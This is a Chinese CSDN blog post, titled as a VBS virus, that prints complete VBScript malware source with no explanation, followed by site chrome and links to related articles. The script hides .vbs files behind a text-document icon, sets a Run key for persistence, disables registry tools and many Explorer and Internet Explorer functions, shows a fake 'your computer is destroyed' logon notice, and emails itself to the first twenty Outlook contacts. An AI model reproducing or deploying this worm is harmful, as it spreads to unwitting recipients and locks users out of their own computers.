一个病毒(vbs)

最新推荐文章于 2024-08-09 12:15:18 发布
最新推荐文章于 2024-08-09 12:15:18 发布
阅读量134 收藏
点赞数 1
文章标签: microsoft windows powerpoint Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/std___/article/details/129641911
版权

On Error Resume Next

Set fs=CreateObject("Scripting.FileSystemObject")

Set dir1=fs.GetSpecialFolder(0)

Set dir2=fs.GetSpecialFolder(1)

Set so=CreateObject("Scripting.FileSystemObject")

dim r

Set r=CreateObject("Wscript.Shell")

r.Regwrite "HKLM\Software\classes\vbsfile\defaulticon\","shell32.dll,-152"

r.Regwrite "HKLM\Software\classes\vbsfile\","文本文档"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",63000000,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"

r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"

r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"

r.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"

r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","你好!"

r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","你的电脑已经毁掉。请立即更新。"

Set ol=CreateObject("Outlook.Application")

On Error Resume Next

For x=1 To 20

Set Mail=ol.CreateItem(0)

Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)

Mail.Subject="你没事吧?"

Mail.Body="我给你发了一个邮件,里面有妙方。"

Mail.Attachments.Add(dir2&"Win32system.vbs")

Mail.Send

Next

ol.Quit

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD"

r.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","https://www.baidu.com/"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"

std___
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vbs计算机病毒代码,vbs病毒的简单例子源代码解析
weixin_35985795的博客
07-28 1761
vbs病毒的简单例子源代码解析2007-03-26 00:00:00 作者:vbs病毒的简单例子源代码解析说明:作者对某些代码进行了修改。该文件是一个完整的程序。该文件执行之后,会寻找硬盘上所有满足条件的文件,对其进行强制性覆盖(满足条件的文件数据将全部丢失)、并再创建一个相同文件名但后带.vbs的文件。因此,请注意设立好破坏测试条件,千万不要对他人进行测试,否则,一切后果自负。如果你的系统不支持...
一个vbs脚本病毒病毒原理分析
09-01
主要介绍了对一个vbs脚本病毒病毒原理分析的相关资料,非常不错,具有参考借鉴价值,需要的朋友可以参考下
脚本病毒制作与分析
xlsj雪松的博客
05-21 4662
一、什么是脚本病毒 脚本病毒通常是 JavaScript 或 VBScript 等语言编写的恶意代码,该脚本语言功能非常强大,它们利用Windows系统的开放性特点,通过调用一些现成的Windows对象、组件,可以直接对文件系统、注册表等进行控制,功能非常强大。 通过网页进行的传播的病毒较为典型,脚本病毒还会有如下前缀:VBS、JS(表明是何种脚本编写的),如欢乐时光(VBS.Happytim...
vbs病毒
Zengkaichen的博客
10-14 4637
大家好,那今天小编的要给大家分享一个我搜集一个vbs病毒。 这个病毒仅供参考,在还没有读懂源码之前(因为我是搜集来的代码,所以其实我自己也不懂,嘿嘿嘿......望大佬指教。),请不要运行代码!!(很重要) 有一点,这个病毒是我供给大家学习的,请不要用作非法用途,造成任何后果与本人无关。 那话不多说,直接上源码: On Error Resume Next Set fs=CreateObject("Scripting.FileSystemObject") Set dir1=fs.GetSpecial
vbs计算机病毒代码,一段病毒常用的VBS代码
weixin_36298146的博客
07-28 2088
On error resume nextDim fso,wshell,curfolder,curdristr,curdriSet fso=createobject("scripting.filesystemobject")Set wshell=CreateObject("WScript.shell")Set curfolder=fso.GetFolder(".")curdristr=Left(WS...
简单vbs脚本病毒代码分析
赖格宝的博客
01-13 881
这行代码设置objScriptExec(即我们之前创建的快捷方式)的目标路径为"C:\Windows\System32\notepad.exe",也就是说,这个快捷方式会指向记事本应用程序。使用FileSystemObject的GetAbsolutePathName方法取"C:\Users\Public\Desktop\test.lnk"这个文件的绝对路径。这行代码保存我们创建的快捷方式。如果之前的步骤都正确,那么在用户桌面上就会有一个名为"test.lnk"的快捷方式,该快捷方式会打开记事本应用程序。
VBS病毒弱点
HWP
11-14 2186
VBS脚本病毒由于其编写语言为脚本,因而他不会像PE文件那样方便灵活,它的运行是方便灵活的, 它的运行是需要条件的(不过这种条件默认情况下就具备啦)VBS脚本病毒具有如下弱点。 ①绝大部分VBS脚本病毒运行时需要用到一个对象:FileSystemObject,具有局限性。 ②VBSorp代码是通过Windows Script Host来解释执行的! ③VBS脚本病毒的运行需要其关联程序Wscrip...
VBS病毒的传播方式
HWP
11-14 3949
VBS脚本病毒之所以传播范围广,主要依赖质于它的网络传播功能,一 般来说,VBS脚本病毒采用以下几种方式进行传播。 1.通过E-mail附件传播 这是一种用的非常普遍的传播方式,病毒可以通过各种方法得到合法的E-mail地址,最常见的就是直接获取uutlook地址簿中的邮件地址,也可以通过程序在用户文档(如htm文件)中搜索E-mail地址。 2.通过局域网共享传播 局域网共享...
VBS写成的远控病毒分析
weixin_44156885的博客
11-23 556
Agent.a病毒分析 样本信息 MD5:78a0e123da2a2555f830cb880293c10d 样本概述 该病毒一个通过可移动磁盘传播的后门病毒。其感染主机后会分别将自身拷贝到自启目录和临时目录,并添加自启以实现持久化。其在运行后会连接http://shabh.no-ip.biz:1975/is-ready上传主机信息和接收控制指令,并在主机使用可移动磁盘时感染可移动磁盘。 行为概述 注册表行为 1,分别在·HKEY_CURRENT_USER\Software\Microsoft\Window
VBS病毒—小病毒2
PythonIDLE3的博客
06-29 501
病毒程序要慎用!!!
VBS脚本病毒总结与分析
一半西瓜的博客
10-28 8170
赞赏码 & 联系方式 & 个人闲话 这篇文章其实是我的结课论文,整个病毒分析的课上完感觉就对VBS病毒有点兴趣,期末也就写这个当大作业了,PE病毒实在烧脑只能说声打扰了。这门课其实也和我其他专栏一样有一系列实验报告的,但是我感觉一是意义不大,二是截图被我弄得着实不太好看,就不发了。这篇大作业我总结了对VBS的一些浅略心得,以及对应的一段杀毒代码,当时写得很开心,现在分享给大家。 ...
Autorun.vbs病毒专杀工具
04-02
虽然只给出了一个文件名 "Autorun.vbs病毒专杀工具",但我们可以推断这个文件可能是该工具的执行程序或者包含详细说明的文档。这个文件可能是可执行文件(.exe),用户运行后可以在电脑上安装或启动该专杀工具;也...
修复被vbs病毒感染的html文件小工具
11-10
标题中的“修复被vbs病毒感染的html文件小工具”指的是一个专门用来处理HTML文件中被VBS(Visual Basic Script)病毒感染的问题的实用程序。VBS病毒是一种基于脚本的恶意软件,它通常通过电子邮件、不安全的下载链接...
修复被vbs病毒感染的html文件自用工具
11-13
标题中的“修复被vbs病毒...综上所述,这个工具为用户提供了自我修复VBS病毒感染HTML文件的能力,是个人用户对抗这种特定类型病毒一个实用工具。正确使用并结合日常的安全防护措施,可以有效减少VBS病毒带来的危害。
VisionPro二次开发学习笔记4-使用C#创建绘图图形
风凌的博客
08-06 1090
这个方法的作用是初始化两个图形(一个矩形和一个圆),并将它们添加到一个显示控件中,使得用户可以通过鼠标交互来调整这些图形的大小(矩形)和半径(圆)。通过设置颜色、交互属性和允许的交互方式,提供了一个用户友好的图形界面,便于用户进行视觉化操作。
PythonStudio 控件使用常用方式(十六)TButtonedEdit
最新发布
gxchai的博客
08-09 393
PythonStudio是一个极强的开发Python的IDE工具,它使用的是Delphi的控件,常用的内容是与Delphi一致的。但是相关文档并一定完整。现在我试试能否逐步把它的控件常用用法写一点点,也作为PythonStudio的参考。从1.2.1版开始,PythonStudio又增加了很多新的控件。TButtonEdit是一个比较有意思的控件,它支持在编辑框左右两边各加一个图标,图标也可以设置为鼠标移上变化。一般来说,这个图标可以设置为聊天框中的发送,或是搜索图标,预览图标等。
vtkConnectivityFilter提取连通区域中的问题
ID5418的杂货铺
08-07 293
2. 正确的做法是后街一个vtkCleanPolyData过滤器。
最近在写的支付模块
weixin_67865831的博客
08-08 645
redis监听器 订单模块
VBS脚本病毒:原理解析、防范策略与特点剖析
VBS(Visual Basic Scripting Edition)是一种简单易学的脚本语言,被广泛应用于网页和系统管理,但其特性也使其成为病毒制造者的首选工具。以爱虫和新欢乐时光病毒为例,这类病毒的猖獗主要源于其编写简易和利用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值